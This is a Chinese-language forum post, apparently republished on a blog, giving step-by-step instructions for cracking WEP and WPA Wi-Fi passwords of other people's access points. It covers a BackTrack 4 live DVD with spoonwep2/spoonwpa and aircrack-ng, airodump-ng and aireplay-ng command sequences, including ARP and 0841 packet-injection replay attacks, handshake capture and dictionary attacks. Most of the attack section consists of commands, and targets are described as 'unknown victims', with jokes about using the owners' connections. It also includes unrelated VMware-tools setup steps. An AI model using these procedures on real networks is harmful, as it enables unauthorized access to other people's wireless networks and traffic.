集成spoonwep2与spoonwpa光盘版BT4及破.解方法
我用bt4-beta光盘版破.解方法与命令,那里不对请各位高手给予指点及修改。我的显卡NVIDIA GeForce 9300M GS,我的网卡是Intel (R) WiFi Link 5100 AGN,先将网卡的驱动软件升级到12.2.0.11这版本(其他版本我个人试过多不行),下载了bt4-beta,下载了spoonwep2(下载后解压),下载了SWPA(下载后解压),用雨林木风的UltraISO 8.66软件编辑spoonwep.lzm及SWPA.lzm这2个文件到bt4-beta下的modules目录中,然后用nero7.5.9.0软件将保存好的镜像刻录成DVD光盘,一张完美的光盘版bt4-beta做好啦。
光盘启动,用户名:root回车、密码:toor(一般多不会显示)回车、startx回车后就进入图形界面(显卡支持的话)。
3条命令破.解法:
先开一个窗口输入第一条:aireplay-ng -9 wlan0回车(等待数据跳动停止)
输入第二条:airodump-ng --ivs -w sjb -c 6 wlan0回车
另开一个窗口输入第三条:aircrack-ng -n 64 -b 00:11:22:33:44:55 sjb-01.ivs回车(00:11:22:33:44:55改成实际要破.解密码的网卡,如sata数据包涨的够快,大约到15000个左右密码自动就出来啦,目前只能被动破.解密码,还没有注入成功过,如sata数据包涨的很慢,就只能开着电脑慢慢等待)
spoonwep2破.解法:
先开一个窗口输入ln -fs bash /bin/sh回车,再输入ls -al /bin/sh回车(这个命令可以显示是否设置成功,显示bash为成功,dash为失败),如是成功的话就输入spoonwep2回车后就会弹出spoonwep2的窗口啦。点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个网卡点击SelectION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破.解,我个人认为还是被动破.解或注入不是很成功吧?
spoonwpa破.解法:
电脑密码破解先开一个窗口输入ln -fs bash /bin/sh回车,再输入ls -al /bin/sh回车(这个命令可以显示是否设置成功,显示bash为成功,dash为失败),如是成功的话就输入spoonwpa回车后就会弹出spoonwpa的窗口啦。在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NE
T CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SelectION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击
金锁开始破.解,这完全的靠字典啦。
感觉SWPA.lzm里面自带的字典太简单啦,字典全用完后连我自己设定的10位数字密码也破.解不了,我把路由器的密码重新设定成SWPA.lzm字典库里的密码,不出10分钟密码就出来啦,这说明spoonwpa破.解WPA密码是可行的,就是所破的密码字典库里必须也有才能破.解。
我用字典生成器生成字典,想把新生成的字典加载到SWPA.lzm里面,然后再刻录成DVD光盘来使用,就不知怎么把字典加到SWPA.lzm里面,或在BT4下用什么命令来加载硬盘里的字典,论坛里的各位高手帮帮忙,我十万分的感谢!谢绝其他办法
一些命令
用户名 root
密码 toor
进图形 startx
BT4有自带的工具networkmanager,不过缺省没有启用
命令 /etc/init.d/NetworkManager start (注意字母大小写)
右下角的球体变绿了,鼠标点击就可以出现有线和无线网络配置菜单,设置好即可上网
Vmware下BT4安装vmware-tools
2009-09-06 11:15加载 vm-tools的iso
mkdir /mnt/cdrom
CD-ROM路径:c:\programfiles\VMware\VMware Workstation\linux.iso
mount /dev/cdrom3 /mnt/cdrom
复制安装包到/tmp目录
cp -rf /mnt/cdrom/VMwareTools-7.8. /tmp/
解压:
tar zxpf VMwareTools-7.8.
然后需要下载一个补丁:
wget www.offensive-security/tools ... k4-7.8.5-2_6_29.tar
tar -xvf vmaware-tools-patch-backtrack4-7.8.5-2_6_29.tar
下完解压后直接运行:
./vmwaretools.sh
执行完后,会提示进入vmware-tools目录执行安装程序:
cd vmware-tools-distrib
./vmware-install.pl
另外,本篇介绍下在ubuntu下使用aircrack -ng 破解WEP密码 此方法为终端输入式破解 文字破解 注入破解 拥有高效的成果。
1、在终端中输入 sudo airmon-ng start wlan0 启动无线网卡的监控模式(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)
启动无线网卡的监控模式
2.在终端中输入 sudo airodump-ng mon0 (特别说明:启动监控模式后无线网的端口现在是 mon0 !!!) 看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端
3.查看在线的AP
另开一个终端,输入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)抓包
4、再另开一个终端,输入 sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0 与AP建立虚拟连接 (-h后面跟着的My MAC是自己的无线网卡的MAC地址)
使无线网卡与AP建立虚拟连接
5.成功建立虚拟连接后
建立虚拟连接成功后,输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 进行
注入,现在回头看下步骤3的终端是不是DATA在开始飞涨
正在进行注入
6、收集有5000个以上的DATA之后,另开一个终端,输入 sudo aircrack-ng wep*.cap 进行解密 (如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)
破解密码成功
破解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。 现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论